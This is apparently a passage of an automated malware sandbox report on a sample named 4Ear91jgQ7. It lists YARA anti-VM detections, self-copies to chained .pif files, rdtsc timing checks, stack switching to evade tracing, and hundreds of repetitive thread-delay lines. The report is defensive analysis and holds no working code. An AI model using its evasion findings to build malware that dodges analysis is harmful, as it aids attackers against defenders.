            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: 4Ear91jgQ7.exe PID: 4416, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 4Ear91jgQ7.pif PID: 6180, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 4Ear91jgQ7.pif PID: 3840, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 4Ear91jgQ7.pif.pif PID: 6436, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 4Ear91jgQ7.pif.pif PID: 5480, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 4Ear91jgQ7.pif.pif.pif PID: 3596, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 4Ear91jgQ7.pif.pif.pif PID: 5000, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 4Ear91jgQ7.pif.pif.pif.pif PID: 4012, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 4Ear91jgQ7.pif.pif.pif.pif.pif PID: 5244, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeMemory allocated: F30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeMemory allocated: 2780000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeMemory allocated: 4780000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifMemory allocated: F50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifMemory allocated: 2AD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifMemory allocated: F50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifMemory allocated: 1620000 memory reserve | memory write watch
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifMemory allocated: 3330000 memory reserve | memory write watch
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifMemory allocated: 17D0000 memory reserve | memory write watch
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifMemory allocated: 1270000 memory reserve | memory write watch
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifMemory allocated: 2D10000 memory reserve | memory write watch
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifMemory allocated: 4D10000 memory reserve | memory write watch
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifMemory allocated: FE0000 memory reserve | memory write watch
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifMemory allocated: 29B0000 memory reserve | memory write watch
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifMemory allocated: 28C0000 memory reserve | memory write watch
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifMemory allocated: 960000 memory reserve | memory write watch
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifMemory allocated: 2420000 memory reserve | memory write watch
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifMemory allocated: 960000 memory reserve | memory write watch
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifMemory allocated: 1920000 memory reserve | memory write watch
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifMemory allocated: 3190000 memory reserve | memory write watch
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifMemory allocated: 19C0000 memory reserve | memory write watch
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifMemory allocated: 1580000 memory reserve | memory write watch
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifMemory allocated: 3030000 memory reserve | memory write watch
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifMemory allocated: 5030000 memory reserve | memory write watch
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifMemory allocated: 1240000 memory reserve | memory write watch
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifMemory allocated: 2D60000 memory reserve | memory write watch
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifMemory allocated: 2B60000 memory reserve | memory write watch
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifMemory allocated: 1000000 memory reserve | memory write watch
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifMemory allocated: 2B60000 memory reserve | memory write watch
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifMemory allocated: 4C60000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F7096E rdtsc 7_2_02F7096E
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 599828Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 599703Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 599594Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 599484Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 599375Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 599263Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 599156Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 599047Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 598688Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 598563Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 598232Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 598007Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 597882Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 597522Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 597376Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 597250Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 597141Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 597031Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 596922Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 596813Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 596688Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 596563Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 596438Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 596328Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 596219Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 596094Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 595860Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 595735Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 595610Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 595360Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeThread delayed: delay time: 594985Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599563Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599450Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599266Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599110Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598945Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598828Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598712Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598605Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598500Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598375Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598219Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598096Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597972Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597844Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597730Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597621Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597516Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597406Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597297Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597160Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597026Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 596862Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 596495Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 596359Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 596250Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 596141Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 596031Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595922Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595790Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595665Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595563Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595438Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595313Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595188Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 594969Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 594844Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 594735Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 600000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599871
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599749
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599639
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599530
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599421
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599300
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599172
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 599056
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598953
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598843
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598732
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598474
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598215
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 598016
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597906
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597793
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597671
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597559
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597452
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597344
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597229
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 597124
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 596953
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 596812
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 596672
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 596500
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 596281
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595969
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595797
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595609
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595406
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595187
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 595042
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 594922
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 594765
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 594640
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifThread delayed: delay time: 594496
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 600000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 599765
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 599578
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 599375
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 599156
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 599006
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598781
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598562
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598390
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598187
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 597797
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 597484
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 597218
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596984
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596765
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596593
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596465
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596323
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595984
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595854
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595703
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595547
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595375
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595218
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595047
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594887
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594758
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594625
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594495
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594347
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594215
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594070
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 593936
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 593593
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 593457
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 593296
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 593156
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 593029
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 592890
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 592750
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 592573
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 592452
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 592315
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 592150
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 600000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 599812
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 599667
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 599541
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 599437
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 599328
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 599217
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 599109
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598978
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598850
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598734
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598618
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598515
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598393
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598265
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 598140
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 597966
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 597845
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 597734
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 597590
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 597468
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 597336
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 597229
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 597106
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 597000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596888
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596781
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596671
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596562
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596452
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596343
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596234
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596124
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 596015
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595906
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595765
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595547
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595434
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595328
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595214
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595109
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 595000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594886
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594780
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594656
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594546
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594437
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594314
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifThread delayed: delay time: 594187
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 600000
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599812
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599629
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599503
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599375
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599251
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 599117
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598996
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598886
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598751
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598390
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598234
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 598091
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597937
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597802
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597656
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597518
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597382
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597271
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 597124
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596984
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596875
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596734
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596591
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596481
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596363
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596223
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 596094
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifThread delayed: delay time: 595984
